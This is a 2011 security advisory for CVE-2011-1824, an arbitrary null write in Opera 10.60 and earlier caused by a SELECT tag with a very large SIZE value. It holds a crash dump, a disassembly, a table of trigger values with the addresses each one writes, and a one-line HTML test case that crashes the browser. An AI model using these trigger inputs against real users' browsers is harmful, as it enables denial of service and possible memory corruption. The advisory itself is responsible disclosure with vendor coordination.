[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

TSSA-2011-02 - Opera : SELECT SIZE Arbitrary null write



---------------------------------------------------------------------------
-                                                                         -
*              Opera : SELECT SIZE Arbitrary null write                   *
-                                                                         -
---------------------------------------------------------------------------




--[ Vulnerability Summary:

Date Published: 03/05/2011
Last Update: 03/05/2011
Advisory ID: TSSA-2011-02
CERT Name: CVE-2011-1824
Title: Opera : SELECT SIZE Arbitrary null write
Remotely Exploitable: Yes
Locally Exploitable: No
Impact: Remote DoS, potentially arbitrary code execution
Advisory URL: http://www.toucan-system.com/advisories/tssa-2011-02.txt


--[ Introduction:

    Opera is a web browser having a market share of about 2,74%
    following http://en.wikipedia.org/wiki/Usage_share_of_web_browsers .

    Following the vendor, it runs on "Mac, PC and Linux computers, mobile
    phones and PDAs, game consoles, and other devices like the
    Nintendo Wii, DS, Sony Mylo, and more."


--[ Synopsis:

    Opera up to and including version 10.60 is vulnerable to an arbitrary
    memory write of 0x00000000, 4byte aligned, when processing an html
    page featuring a SELECT tag with a very large SIZE parameter.


- --[ Vulnerabilities overview:

    When fed with an html page featuring a very large SIZE parameter
    in the SELECT tag, Opera deterministically segfaults on the
    following instruction:

Program received signal SIGSEGV, Segmentation fault.
-----------------------------------------------------------------[regs]
eax:00000000 ebx:786C7FF8  ecx:0000001D  edx:00000008 eflags:00010206
esi:5E063FF8 edi:00368084  esp:BFE5672C  ebp:BFE56738 eip:080BACEB
cs:0073  ds:007B  es:007B  fs:0000  gs:0033  ss:007B o d I t s z a P c
[0073:080BACEB]---------------------------------------------------[code]
--[ Instruction:
=> 0x80baceb:    mov    DWORD PTR [ebx+edx*1],eax

    This instruction is an invalid write to memory.
    After carefull analysis, it appears that eax can only be null,
    which means only 0x00000000 can be written in memory. ebx is
    also always a multiple of 4, meaning that the invalid write
    is 4 byte aligned.

    This instruction actually happens in a routine which zeroes memory
    for the select tag:

   0x80bacb0:    push   ebp
   0x80bacb1:    mov    ebp,esp
   0x80bacb3:    push   edi
   0x80bacb4:    push   esi
   0x80bacb5:    push   ebx
   0x80bacb6:    mov    edx,DWORD PTR [ebp+0x8]        ; edx is a
function argument

   0x80bacb9:    mov    esi,DWORD PTR [ebp+0xc]         ; same for esi
   0x80bacbc:    mov    edi,DWORD PTR [ebp+0x10]
   0x80bacbf:    mov    ecx,DWORD PTR [edx+0x8]
   0x80bacc2:    test   ecx,ecx
   0x80bacc4:    je     0x80bad00
   0x80bacc6:    cmp    DWORD PTR [edx+0x1c],edi
   0x80bacc9:    jle    0x80bad00
   0x80baccb:    mov    ecx,DWORD PTR [edx+0x18]
   0x80bacce:    mov    eax,DWORD PTR [edx+0x10]
   0x80bacd1:    mov    ebx,DWORD PTR [edx+0x8]        ; ebx is
computed from edx (f argument, see before)

   0x80bacd4:    test   ecx,ecx
   0x80bacd6:    je     0x80bacf6              ; ecx null ? then return
   0x80bacd8:    shl    eax,0x2                ; shift left of 2 bits
on eax

   0x80bacdb:    xor    edx,edx                ; edx=0 in first iteration
   0x80bacdd:    imul   eax,edi
copyloop:
   0x80bace0:    add    ebx,eax                ; add eax to ebx
   0x80bace2:    lea    esi,[esi+0x0]
   0x80bace8:    mov    eax,DWORD PTR [esi+edx*1]        ; use esi as
an index and read 32b into eax

=> 0x80baceb:    mov    DWORD PTR [ebx+edx*1],eax    ; write to memory
pointed to by ebc+edx the content of eax

   0x80bacee:    add    edx,0x4
   0x80bacf1:    sub    ecx,0x1
   0x80bacf4:    jne    0x80bace8    ; if ecx != 0, goto copyloop;
   0x80bacf6:    xor    eax,eax
   0x80bacf8:    pop    ebx
   0x80bacf9:    pop    esi
   0x80bacfa:    pop    edi
   0x80bacfb:    pop    ebp
   0x80bacfc:    ret


    The register ebx is threfor computed given the formula below:

    ebx=[[ebp+0x8]+0x8]+([[ebp+0x8]+0x10]<<0x2)*[ebp+0x10]

    A few experiments allow to simply verify the extent of
    memory that can be overwritten:

    <HTML><SELECT SIZE="00900921041">
    ebx:93AF7F8C
    <HTML><SELECT SIZE="00900561724">
    ebx:4403BFC0
    <HTML><SELECT SIZE="00900756136">
    ebx:6F1EFFD8
    <HTML><SELECT SIZE="00900572153">
    ebx:46539FE0
    <HTML><SELECT SIZE="00900923051">
    ebx:94219FD0
    <HTML><SELECT SIZE="00900921169">
    ebx:93B6BF9C
    <HTML><SELECT SIZE="00900922165">
    ebx:93EF3FD0
    <HTML><SELECT SIZE="00900602573">
    ebx:4D125F94
    <HTML><SELECT SIZE="00900809223">
    ebx:7AE45F88
    <HTML><SELECT SIZE="00900923006">
    ebx:941EFFA8
    <HTML><SELECT SIZE="00900971567">
    ebx:9EE37FF8
    <HTML><SELECT SIZE="00900579223">
    ebx:47E4FF98
    <HTML><SELECT SIZE="00900921760">
    ebx:93D85FC4
    <HTML><SELECT SIZE="00900929223">
    ebx:957FDFA0
    <HTML><SELECT SIZE="00900825726">
    ebx:7E8D1FA8
    <HTML><SELECT SIZE="00900927668">
    ebx:9527A000
    <HTML><SELECT SIZE="00900922184">
    ebx:93F05FAC
    <HTML><SELECT SIZE="00900632570">
    ebx:53B91FDC
    <HTML><SELECT SIZE="00900921961">
    ebx:93E3BFCC
    <HTML><SELECT SIZE="00900922873">
    ebx:94177FA0
    <HTML><SELECT SIZE="00900929223">
    ebx:957FDFA0
    <HTML><SELECT SIZE="00900922268">
    ebx:93F51F90
    <HTML><SELECT SIZE="00900921786">
    ebx:93D9BF98
    <HTML><SELECT SIZE="00900923999">
    ebx:94575FE0
    <HTML><SELECT SIZE="00900572139">
    ebx:4652DFF8
    <HTML><SELECT SIZE="00900929223">
    ebx:957FDFA0
    <HTML><SELECT SIZE="00900772722">
    ebx:72CC7FDC
    <HTML><SELECT SIZE="00900877306">
    ebx:89FCFFDC
    <HTML><SELECT SIZE="00900177403">
    ebx:94FA9FD0
    <HTML><SELECT SIZE="00900126792">
    ebx:94063FD8
    <HTML><SELECT SIZE="00900922735">
    ebx:940F9FA4
    <HTML><SELECT SIZE="00900169223">
    ebx:93E60000
    <HTML><SELECT SIZE="00900793113">
    ebx:77520000
    <HTML><SELECT SIZE="00900851961">
    ebx:845E5FFC
    <HTML><SELECT SIZE="00900713397">
    ebx:65A51FDC
    <HTML><SELECT SIZE="00900273276">
    ebx:945D3FA0
    <HTML><SELECT SIZE="00900251857">
    ebx:957FDFA0
    <HTML><SELECT SIZE="00900568075">
    ebx:456C3FBC
    <HTML><SELECT SIZE="00900831482">
    ebx:7FD3DFFC
    <HTML><SELECT SIZE="00700102798">
    ebx:A466BFE0
    <HTML><SELECT SIZE="00700206518">
    ebx:BB663FB4
    <HTML><SELECT SIZE="00700191247">
    ebx:B8035F90
    <HTML><SELECT SIZE="00300695676">
    ebx:B425FFB8
    <HTML><SELECT SIZE="00300389223">
    ebx:7032DFC0
    <HTML><SELECT SIZE="00300302667">
    ebx:5D01BFB4
    <HTML><SELECT SIZE="00300219223">
    ebx:4A813FDC
    <HTML><SELECT SIZE="00300412279">
    ebx:754F9FE0
    <HTML><SELECT SIZE="00300239223">
    ebx:4EF07FE0
    <HTML><SELECT SIZE="00300352729">
    ebx:681B5F8C
    <HTML><SELECT SIZE="00300301905">
    ebx:5CD67FC8
    <HTML><SELECT SIZE="00300211808">
    ebx:48DC5FAC



--[ Exploitability considerations:

    Exploitation of arbitrary null writes in userland, as opposed to
    kernel land where exploitation is immediate (by zeroing the
    task_struct->cred->euid), have not been publicly systematized.

    In spite of our best efforts to attack (zero) variables using CSS,
    javascript or to attack the error handlers, we could not achieve
    remote execution.

    That being said, remotely writting to the memory of a process is
    definitly a high impact vulnerability, and remote code execution
    can not be excluded.


--[ Test case:

    The following trivial test case triggers the vulnerability:

    <--!
      Opera <= 10.60 Arbitrary null write
      Jonathan Brossard // jonathan.brossard@xxxxxxxxxxxxxxxxx
      Published on 18/04/2011
     -->
    <HTML><SELECT SIZE="67202666">


--[ Mitigation:

    Opera users are encouraged to upgrade their web browser to the
    latest version of the software (11.10 at the time of writing).


--[ Vulnerable versions:

    Vulnerable : Opera version <= 10.60
    Non vulnerable : Opera version >= 10.61


--[ Disclosure timeline:

    * 02/08/2010: Toucan System send the Opera Team
      a full vulnerability report including test cases.
    * 03/08/2010: The Opera Team acknowledge the bug.
      Vendor assigns it tracker DSK-309026.
      Vendor identifies the problem as coming from
      the VEGAOpBitmap::AddLine function.
      Vendor silently patches the bug in version 10.61.
    * 05/01/2011: Toucan system reports the bug to the
      CERT.
    * 19/01/2011: The CERT grants the issue tracker
      VU#778396.
    * 21/04/2011: The CERT grants the issue CVE-2011-1824.
    * 3/05/2011: Public disclosure.

--[ Credits:

    This vulnerabilitie was discovered by Jonathan Brossard from
    Toucan System.


--[ About Toucan System:

    Toucan System is a French computer security company providing
    cutting edge research and security consulting to Fortune 500
    as well as smaller companies globally, thanks to a wide range
    of expertise ranging from Reverse Engineering
    and binary analysis to cryptography and Risk Management.